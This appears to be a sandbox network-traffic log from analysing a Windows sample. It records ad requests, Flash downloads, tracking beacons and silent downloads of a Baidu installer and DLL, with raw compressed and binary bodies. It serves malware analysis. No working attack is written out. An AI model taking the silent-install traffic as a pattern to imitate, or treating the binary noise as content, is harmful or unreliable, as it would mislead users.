F|cpro_cdesc=#444444|cpro_curl=#008000|cpro_cflush=#e10900|cpro_161=3|
cpro_flush=4|cpro_cad=1","qn" : "6dc8052231d438f7","_qid" : "6dc805223
1d438f7"}});....
<<< skipped >>>

GET /ecom?cec=utf-8&dai=2&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4&ltr=&ltu=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=6dc8052231d438f7&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537511&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537511 HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:28:58 GMT
Content-Type: text/html
Content-Length: 10841
Connection: Keep-Alive
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat Jun 14 01:28:58 2014
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<!-- 0|1; --&
gt;..<meta http-equiv="Content-Type" content="text/html; charset=UT
F-8" />..<meta http-equiv="X-UA-Compatible" content="IE=7" />
..<title>..............................</title>..<scrip
t language="javascript" src="hXXp://cpro.baidu.com/extra/text_flash/AC
_RunActiveContent.js"></script>..<style>..body{margin:0
;padding:0;}...uptown{position:relative;width:336px;height:280px;}...u
ptown #dish0{width:336px;height:280px;position:absolute;top:0;left:0;b
ackground-color:#fff;opacity:0;filter:alpha(opacity=0);}...uptown #dis
h1{width:336px;height:280px;position:absolute;top:0;left:0;border:#FFF
FFF solid 1px; }..a.logo{display:block;height:18px;width:26px;text-ali
gn:justify;letter-spacing:20px;text-decoration:none;overflow:hidden;cu
rsor:default;position:absolute;bottom:0px;right:0px;z-index:10;}...cpr
o a.logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(ena
bled=true, src="hXXp://cpro.baidu.com/img/cpro_media_small.png", sizin
gMethod="image");background:url(hXXp://cpro.baidu.com/img/cpro_media_s
mall.png) no-repeat left top;*background:none;}...cpro a.logo:hover{wi
dth:78px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(ena
bled=true, src="hXXp://cpro.baidu.com/img/cpro_media_large.png", sizin
gMethod="image");background:url(hXXp://cpro.baidu.com/img/cpro_med
<<< skipped >>>

GET /ecom?cec=utf-8&dai=3&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=728&rsi1=90&rsi5=4&ltr=&ltu=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=18a90fef6d4567e7&ps=357x3&tn=text_default_728_90&ts=1&td_id=1537506&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537506 HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:02 GMT
Content-Type: text/html
Content-Length: 11398
Connection: Keep-Alive
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat Jun 14 01:29:02 2014
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<!-- 0|1; --&
gt;..<meta http-equiv="Content-Type" content="text/html; charset=UT
F-8" />..<meta http-equiv="X-UA-Compatible" content="IE=7" />
..<title>..............................</title>..<scrip
t language="javascript" src="hXXp://cpro.baidu.com/extra/text_flash/AC
_RunActiveContent.js"></script>..<style>..body{margin:0
;padding:0;}...uptown{position:relative;width:728px;height:90px;}...up
town #dish0{width:728px;height:90px;position:absolute;top:0;left:0;bac
kground-color:#fff;opacity:0;filter:alpha(opacity=0);}...uptown #dish1
{width:728px;height:90px;position:absolute;top:0;left:0;border:#FFFFFF
 solid 1px; }..a.logo{display:block;height:18px;width:26px;text-align:
justify;letter-spacing:20px;text-decoration:none;overflow:hidden;curso
r:default;position:absolute;bottom:0px;right:0px;z-index:10;}...cpro a
.logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enable
d=true, src="hXXp://cpro.baidu.com/img/cpro_media_small.png", sizingMe
thod="image");background:url(hXXp://cpro.baidu.com/img/cpro_media_smal
l.png) no-repeat left top;*background:none;}...cpro a.logo:hover{width
:78px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enable
d=true, src="hXXp://cpro.baidu.com/img/cpro_media_large.png", sizingMe
thod="image");background:url(hXXp://cpro.baidu.com/img/cpro_media_
<<< skipped >>>

GET /sync_pos.htm?cproid=49F93F86C60D03A8D23F3919153C48A7:FG=1 HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://cpro.baidustatic.com/sync.htm?cproid=49F93F86C60D03A8D23F3919153C48A7:FG=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISBID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISUS=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:04 GMT
Content-Type: text/html
Content-Length: 1216
Last-Modified: Wed, 12 Mar 2014 07:45:00 GMT
Connection: Keep-Alive
ETag: "5320107c-4c0"
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Accept-Ranges: bytes
<!DOCTYPE html>.<html>.    .    <head></head>.
    .    <body>.        <script type="text/javascript">   
         .            var getCookie=function(b,d){var a;d=d||window;va
r c=RegExp("(^| )" b "=([^;]*)(;|$)").exec(d.document.cookie);c&&(a=c[
2]);return a},setCookie=function(b,d,a){a=a||{};var c=a.expires;"numbe
r"==typeof a.expires&&(c=new Date,c.setTime(c.getTime() a.expires));do
cument.cookie=b "=" d (a.path?"; path=" a.path:"") (c?"; expires=" c.t
oGMTString():"") (a.domain?"; domain=" a.domain:"") (a.secure?"; secur
e":"")},getUrlParam=function(b){b=RegExp("(^|&)" b "=([^&]*)(&|$)","i"
);b=window.location.search.substr(1).match(b);.            return null
!=b?decodeURIComponent(b[2]):null},currentDomain=document.domain.toLow
erCase(),referDomain=(document.referrer?document.referrer.match(/.*\:\
/\/([^\/]*).*/i)[1]:"").toLowerCase(),urlCproId=getUrlParam("CPROID"),
cookieCproId=getCookie("CPROID"),targetCproId;!urlCproId||"pos.baidu.c
om"!==currentDomain||"cpro.baidu.com"!==referDomain&&"cpro.baidustatic
.com"!==referDomain||cookieCproId&&cookieCproId===urlCproId||setCookie
("CPROID",urlCproId,{path:"/",domain:".pos.baidu.com",expires:(new Dat
e).setFullYear(2042)});.        </script>.    </body>..<
;/html>..
<<< skipped >>>


GET /sync.htm?cproid=49F93F86C60D03A8D23F3919153C48A7:FG=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=1&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4<r=<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=cadbaab171a45209&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537509&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537509
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cpro.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:05 GMT
Content-Type: text/html
Last-Modified: Wed, 07 May 2014 11:40:06 GMT
Transfer-Encoding: chunked
Connection: close
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Content-Encoding: gzip
37d.............VQo.6.~..`.. 3.Z.=.v.......d.C...E.mn.$.T.....QtmI.\..
.lQ....w..9z}.qz....,.*{.j...?..h.2}7..GC...:...V.]:..%...... .. .;=..
*.......s#[email protected]^..."',..[K.i.P5-T....e@:....1.k_....V..u."...........j.
..9......(.....6".........0.T...kc.t.....z..D.p...Ow0..:......(..H.u..
..^....aq.P2..<.N./$./.../......o8...@1%v5........I_.....%..29...c{
......./=....# 1.R......Z%`(..k....E.....=9G.".<.n..X*...GH.6.G.R.S
...5Q.eR..-...!..zg#<#..S0.z.sV...W.......|..lu%.s%u.L.z.t..P..*.A5
.i.>...Lv%.s...I...63.......P.7....." ..'b.....Ub.ao.XI..,9L...2...
dBRPE.../......#).,G0..1h x......I.P.r}(..L.E..........u-7`|.].&.X...f
.,F.g1.(Nb.o...R....d........2:...xyN.1.dnZ.N>d...z.M.........H.N .
...;g..t.A....j.9!..........3..^&.....ZoZ.M....G..H...Jv..o..fz.Q7....
-...W.....,..y.v. ..../.i....1...s..>....[.&.u.?..6...*....3.q.../.
;.I.|.o..>.I..Rv....c.)'.v.2f.Q&.98..L..C.......Uc..kh....ps}.WZ...
...........0..



GET /crossdomain.xml HTTP/1.1
Accept: */*
Accept-Language: en-US
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: control.sm.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:29:14 GMT
Content-Type: application/xml
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 18 Nov 2013 22:02:53 GMT
Server: QmdhZiBtayEK
X-Upstream-IP: 172.16.18.17:8494
Content-Encoding: gzip
[email protected].......(.N;BJ....I......8..@.^......2...3R......P
?..7..e..0.....B...U.W.G....E.'..1....=.~.w.%g.V......



GET /SrcManager/channelInfo?fields=cname,pic1,url1&cid=693619_1371525642501 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/players/2014/05/23/60130//fengyun.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: sm.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:29:18 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=60
X-Upstream-IP: 172.16.18.18:8494
Age: 53
X-Cache: hit
Server: eJxLz8/XS8/RNzUuT0/1BgAfuARs
Content-Encoding: gzip
...........VP..LQR.RP2.463..7467452531250TR.QPJ.K.M. y...yk..|.n..K~I.
.XAAf2P%..0...<.PQ.TA-....uq.....



GET /client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Range: bytes=15597568-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.0 206 Partial Content
Expires: Sun, 13 Jul 2014 16:05:00 GMT
Date: Fri, 13 Jun 2014 16:05:00 GMT
Server: nginx
Content-Type: application/octet-stream
Last-Modified: Tue, 10 Jun 2014 19:14:19 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Content-Range: bytes 15597568-30927031/30927032
Content-Length: 15329464
Age: 5063
Via: 1.0 sdytwt86:80 (Cdn Cache Server V2.0), 1.0 tswt76:80 (Cdn Cache Server V2.0), 1.0 jg11:8888 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe"
.>#L2~.....(#.7.Ez.. Q.9....2C..N.`j/..^...Y^h%8......n...C:6....&.
%[D?>....{Dh.a%jm.-.....^..&D..S.a..Qe.}!(....k.5....mV....p|......
.....$..f.. d../|4k..z'..#.?...................pX.s...2.......3._e.Va.
..9.i.......p.p..8.DP...d.....t.......<ba........u`......pS.-UN.C..
..C....p...;[email protected].}..w.,.l...V....c.s.w.ul....3..
."....?U..sYK...........r.............;[email protected]....,u].IRh
-..Enx.8..,j.....M8.-W0.6#fZ.......^2.EA.e7}d#Y...3.7 .....b.i...<O
.....s*.Q..;#......V.]5~bY.........X.......o`.18..#..!.....V^..6.....D
Ff..'....tH...#c82.5.?.'.*~..=./..i..x4...w.Hj.=....%Xn.6.Q.F....4...*
.oj...'.yC..b..$.% ...[.D.Q..k.h.Dx...)n....O...g...\..>s<..3..%
.F.....SU .q.i@..... 0...[~..Qo..LuH~. .....r`......q.....Cz4<: ;.9
..6...N...%...}......VM....Z_.e.X].t....3..15...51.,..[..V"G..s.{....Z
{k....1..a..'Y?.A.......).Nh..&..........h"..:..BLW;...F..H1E3.<..E
.........4}.....NR....}B........W..'.x.|1MW.?..........*PLg.....K.....
..hmi|@[email protected].$R;......x..1h..U.~*B..%.....".x.M]hjQ....anG .{>..&.
.E..9.u.[.........<.....U..x.3lw ...>...g......1VU........5.....
.0..\`\*'..8.....W:..... ...U...4l^ a...0;..X...3.....A'..IF{.n..%....
`1.So.jb..BA..MI....iuv.....#:M.6D..ZZu.... F.c..O=..h.^..`p.2.W.h...G
......._.O.........J.....x...B....,..$?|...aYLS?.......L7c...[S.zW.>
;XW2..="..l&q..d->...tw.....d..:[email protected]{..5.J.)...s*Z..D...9..2.H
.Pf`...F....'&.x...0.|.Y...........f.G.-H.y........>.X1.3..'R?.....
.....R}......X....s.^.V..@.>.........e..Y........C....[...2..).
<<< skipped >>>


GET /upload/mobileAds4.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/[[IMPORT]]/resource.dl.kukuplay.com/upload/fishrlv31.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: resource.redirect.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: pws/1.4.2.9
Date: Fri, 13 Jun 2014 17:29:39 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: hXXp://resource.dl.kukuplay.com/upload/mobileAds4.swf
<html>..<head><title>302 Found</title></hea
d>..<body bgcolor="white">..<center><h1>302 Found
</h1></center>..<hr><center>pws/1.4.2.9</ce
nter>..</body>..</html>..HTTP/1.1 302 Moved Temporarily
..Server: pws/1.4.2.9..Date: Fri, 13 Jun 2014 17:29:39 GMT..Content-Ty
pe: text/html..Content-Length: 160..Connection: keep-alive..Location: 
hXXp://resource.dl.kukuplay.com/upload/mobileAds4.swf..<html>..&
lt;head><title>302 Found</title></head>..<body
 bgcolor="white">..<center><h1>302 Found</h1><
/center>..<hr><center>pws/1.4.2.9</center>..</
body>..</html>....



GET /go/full/1/70745 HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: w.x.baidu.com
Range: bytes=7864320-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.4.3
Date: Fri, 13 Jun 2014 17:29:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.2
Location: hXXp://dl1sw.baidu.com/client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe



GET /media/v1/0f000Qb3PMHRPyvfvvYfG6.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0005DLCKKC2jqXKT7t1s.swf?url_type=1&id_433067180=media/v1/0f000KLx1mYZLI-ed9V_os.jpg&id_4880777
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:37 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 2891
Cache-Control: max-age=31536000
Expires: Thu, 26 Mar 2015 08:39:15 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
CWS.....x..W{pSU.?....<.$m..........-.h.f....... .....h^....T......
...#...(;...U.uP......Z. ...Hq.V..Y.....t..c..{....~..|..sN.`V..M..!hL
.....q..P.r...6.t........b7...M.......5.B.L.UUU&..TQa..C...3..?\PlI(h.
...'.{.~.0f.@ _[\|K..qGi.5.M.t:L...q~>l*7.cENG. ..1.......#.3E.aw..
.v..3..L.]c...d.!...!...1.r...6M..[Y.'...G......{9K..q.....n..a..p$..*
.tB&.......$X...8.h.98K!.E.......].x...Vf.g....M...R...s...|[email protected]
WVV..H...5._........U...`%...7.D8.b..`...ho=.......eV!V..@....?'q..'..
...s. ......5.....x....|...].G?....!..~..../V..Tw.X......y.W..........
.. ....T.Vuu.....'.....@.,.......K.....vN.xn....A...u..;ZR.FS......SS.
'?-.t0...P... ..vKF<..?zH.......S..W{....\6x~....~c......Y.)k....y.
.*.@{.w.....^...e...|fxX.g.........c....c..<.e.............6....j..
....dD.r..>.....K...............m.u.]js&.-1u...|p!.G..J.......2....
......RM.o_..T..D.E..{n..;@\{1..<.c. ..u...#h^_..P1..cv...B.d...#..
.W..5t...;....G..:./^c.....,4...n..5;..uEAK.kf_.........zxn.b...^.N...
.?...,.{.d..... F..................{6.....nh{t.....W...[X.;........ltN
....>.8?...z..R.d..N.2..Z.;.R......k..z..<....T~}6.d.f.V&..m....
._.o.....vy.D.dA.p.V.4MP.n.~.M ..,.}7.............I..y.7}.....cI.?#6J\
...kDgn&..Vu...n_|.^}......].;2...^7Qk.c.....=.........'gkMp...7U.....
7.a]o.....s.......R.Q..........Qm9.O.6D'_Ae....Y{..1c...............Z.
...r.N.-.."....l.....0=1.......Jq:.:.$.W...mJ....k.u...yw...a......'Uk
.Z.....dU..(..v.....j..9..W......s....7q.['..f.....x.}......f....TC.).
....)....&V....S...(.8..>vhl.M.9...b..P..f}.<S..\.,.a....X.z
<<< skipped >>>


GET /sw-search-sp/client/dlljg1/BDMNet.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:00 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 1244608
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Wed, 21 Aug 2013 08:14:12 GMT
Expires: Sat, 14 Jun 2014 07:46:32 GMT
x-bs-version: 3DB44104797F6F34C7AB9E0A496537CC
ETag: 6812edbc825d28224d79d3645c9bb0f6
x-bs-request-id: MTAuMjE1Ljg4LjM2OjgwODA6MjQzNDMzNTU2MDoxMS9KdW4vMjAxNCAxNTo0NjozMiA=
x-bs-meta-crc32: 440605594
Content-MD5: 6812edbc825d28224d79d3645c9bb0f6
x-bs-client-ip: MTE1LjIzMS40Mi4xODE=
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......C.0...^...^.
..^... ...^. .#...^. .0.r.^. .3...^.......^.......^..._.=.^. .,.\.^. .
$...^. ."...^. .&...^.Rich..^.........................PE..L...u'.R....
.......!................]^............................................
..................................`-..................................
............`...............................@...@.....................
.......................text............................... ..`.rdata..
......... ..................@[email protected]..............@.
[email protected].......................
........@[email protected][email protected]..................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /sync.htm?cproid=49F93F86C60D03A8D23F3919153C48A7:FG=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=1&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4<r=<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=cadbaab171a45209&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537509&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537509
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cpro.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:09 GMT
Content-Type: text/html
Last-Modified: Wed, 07 May 2014 11:40:06 GMT
Transfer-Encoding: chunked
Connection: close
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Content-Encoding: gzip
37d.............VQo.6.~..`.. 3.Z.=.v.......d.C...E.mn.$.T.....QtmI.\..
.lQ....w..9z}.qz....,.*{.j...?..h.2}7..GC...:...V.]:..%...... .. .;=..
*.......s#[email protected]^..."',..[K.i.P5-T....e@:....1.k_....V..u."...........j.
..9......(.....6".........0.T...kc.t.....z..D.p...Ow0..:......(..H.u..
..^....aq.P2..<.N./$./.../......o8...@1%v5........I_.....%..29...c{
......./=....# 1.R......Z%`(..k....E.....=9G.".<.n..X*...GH.6.G.R.S
...5Q.eR..-...!..zg#<#..S0.z.sV...W.......|..lu%.s%u.L.z.t..P..*.A5
.i.>...Lv%.s...I...63.......P.7....." ..'b.....Ub.ao.XI..,9L...2...
dBRPE.../......#).,G0..1h x......I.P.r}(..L.E..........u-7`|.].&.X...f
.,F.g1.(Nb.o...R....d........2:...xyN.1.dnZ.N>d...z.M.........H.N .
...;g..t.A....j.9!..........3..^&.....ZoZ.M....G..H...Jv..o..fz.Q7....
-...W.....,..y.v. ..../.i....1...s..>....[.&.u.?..6...*....3.q.../.
;.I.|.o..>.I..Rv....c.)'.v.2f.Q&.98..L..C.......Uc..kh....ps}.WZ...
...........0..



GET /crossdomain.xml HTTP/1.1
Accept: */*
Accept-Language: en-US
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ad.log.kukuplay.com
Connection: Keep-Alive
Cookie: _uid=1402680558.276_3849dc759772bdef0005a56a45340f99; _sid=1402680558.276_5826ebfd9fb3ac4faecb181ac2e1a592; _lsid=1402680558.276_3b13680dfbf594d4526fb6d329e78252


HTTP/1.1 200 OK
Server: ngx_openresty/1.2.6.6
Date: Fri, 13 Jun 2014 17:29:40 GMT
Content-Type: text/xml
Content-Length: 257
Last-Modified: Fri, 13 Jun 2014 08:53:44 GMT
Connection: keep-alive
Accept-Ranges: bytes
<?xml version="1.0"?>.<!DOCTYPE cross-domain-policy SYSTEM "/
xml/dtds/cross-domain-policy.dtd">.<cross-domain-policy> .   
<site-control permitted-cross-domain-policies="master-only"/>.  
 <allow-access-from domain="*" to-ports="*" />.</cross-domain
-policy>......



GET /hm.gif?cc=1&ck=1&cl=32-bit&ds=1276x846&et=0&fl=11.6&ja=1&ln=en-us&lo=0&nv=1&rnd=185369738&si=e52aa1ba5cd407a52e95d6c7249929a9&st=3&su=http://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=&v=1.0.59&lv=1&tt=风云直播MINI HTTP/1.1
Accept: */*
Referer: hXXp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hm.baidu.com
Connection: Keep-Alive
Cookie: HMACCOUNT=CEF89CEABD29A927; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Cache-Control: private, max-age=0, no-cache
Pragma: no-cache
Content-Type: image/gif
X-Content-Type-Options: nosniff
Connection: Keep-Alive
Content-Length: 43
Date: Fri, 13 Jun 2014 17:29:05 GMT
Server: apache
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Cache-Cont
rol: private, max-age=0, no-cache..Pragma: no-cache..Content-Type: ima
ge/gif..X-Content-Type-Options: nosniff..Connection: Keep-Alive..Conte
nt-Length: 43..Date: Fri, 13 Jun 2014 17:29:05 GMT..Server: apache..GI
F89a.............!.......,...........L..;..



